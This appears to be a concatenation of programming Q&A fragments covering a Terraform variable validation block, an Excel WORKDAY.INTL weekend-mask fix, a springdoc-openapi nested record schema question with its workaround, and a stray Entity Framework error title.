description = "list of sc default values"
default = [false, false, false, false]
validation {
condition = length(var.sc_default) == 4
error_message = "Four defaults expected"
}
validation {
condition = sum([for x in var.sc_default : x ? 1 : 0]) < 2
error_message = "Only one sc can be true"
}
}
```
[1]: https://developer.hashicorp.com/terraform/language/meta-arguments/lifecycle#custom-condition-checks |
|mysql| |
`WORKDAY.INTL()` is working as intended.
In the `WORKDAY.INTL()` function, `1` represents a `non-workday` and `0` represents a `workday`. That said, `29th Feb'24` is a `Thursday` and you have made it a `non-workday`; hence in your formula only `Monday` and `Saturday` are `workdays` and the rest are `non-workdays`. Read the `MSFT` documentation [here][1].
[![enter image description here][2]][2]
----------
**What has been used:**
=WORKDAY.INTL(B3,1,"0111101",Holidays[[Date]:[Date]])
----------
**What needs to be used:**
[![enter image description here][3]][3]
----------
=WORKDAY.INTL(B3,1,"0000100",Holidays[[Date]:[Date]])
----------
Or, instead of using `"0000100"` use `16`
=WORKDAY.INTL(B3,1,16,Holidays[[Date]:[Date]])
----------
In context of your OP, the formula will be:
=WORKDAY.INTL(K4, L2, "0000100", holidays!A2:A9)
----------
[1]: https://support.microsoft.com/en-us/office/workday-intl-function-a378391c-9ba7-4678-8a39-39611a9bf81d
[2]: https://i.stack.imgur.com/jNO1s.png
[3]: https://i.stack.imgur.com/mESCZ.png
|
Thank you in advance for the help.
I am using Spring Boot WebFlux 3 with springdoc-openapi 2.4.
Here is my response entity records
```
public record UserResponse(
Integer id,
String name,
ScoreResponse scoreSummary
){
}
```
```
public record ScoreResponse(
Integer avgScore,
List<Score> score
){
public record Score(
Integer scoreId,
Integer score
){
}
}
```
Here is the handler class
```
@Component
@RequiredArgsConstructor
public class UserHandler {
private final UserService userService;
private final UserMapper userMapper;
private final ClientAuthorizer clientAuthorizer;
@Bean
@RouterOperations({
@RouterOperation(
path = "/user/{userId}",
produces = {MediaType.APPLICATION_JSON_VALUE},
method = RequestMethod.GET,
beanClass = UserHandler.class,
beanMethod = "getById",
operation = @Operation(
description = "GET user by id", operationId = "getById", tags = "users",
responses = @ApiResponse(
responseCode = "200",
description = "Successful GET operation",
content = @Content(
schema = @Schema(
implementation = UserResponse.class
)
)
),
parameters = {
@Parameter(in = ParameterIn.PATH,name = "userId")
}
)
)
})
public @NonNull RouterFunction<ServerResponse> userIdRoutes() {
return RouterFunctions.nest(RequestPredicates.path("/user/{userId}"),
RouterFunctions.route()
.GET("", this::getById)
.build());
}
@NonNull
Mono<ServerResponse> getById(@NonNull ServerRequest request) {
String userId = request.pathVariable("userId");
return authorize(request.method(), request.requestPath())
.then(userService.getUserWithScore(userId))
.flatMap(result -> ServerResponse.ok().body(Mono.just(result), UserResponse.class))
.doOnEach(serverResponseSignal -> LoggingHelper.addHttpStatusToContext(serverResponseSignal, HttpStatus.OK));
}
....
}
```
The expected example in Swagger UI is
```
{
"id": 1073741824,
"name": "string",
"scoreSummary": {
"avgScore": 1073741824,
"score": [
{
"scoreId": 1073741824,
"score": 1073741824
}
]
}
}
```
But actual example is
```
{
"id": 1073741824,
"name": "string",
"scoreSummary": {
"avgScore": 1073741824,
"score": [
"string"
]
}
}
```
Additionally I can see an error in the UI
```
Errors
Resolver error at responses.200.content.application/json.schema.$ref
Could not resolve reference: JSON Pointer evaluation failed while evaluating token "score" against an ObjectElement
```
Please help me to find what I am missing.
After days of research I found the following, and it worked: I got the expected result. But I need to understand whether there is a better approach, or whether this is fine.
Added below bean definition in my handler class.
```
@Bean
public OpenApiCustomizer schemaCustomizer() {
ResolvedSchema resolvedSchema = ModelConverters.getInstance()
.resolveAsResolvedSchema(new AnnotatedType(Score.class));
return openApi -> openApi
.schema(resolvedSchema.schema.getName(), resolvedSchema.schema);
}
``` |
The expression 'x' is invalid inside an 'Include' operation |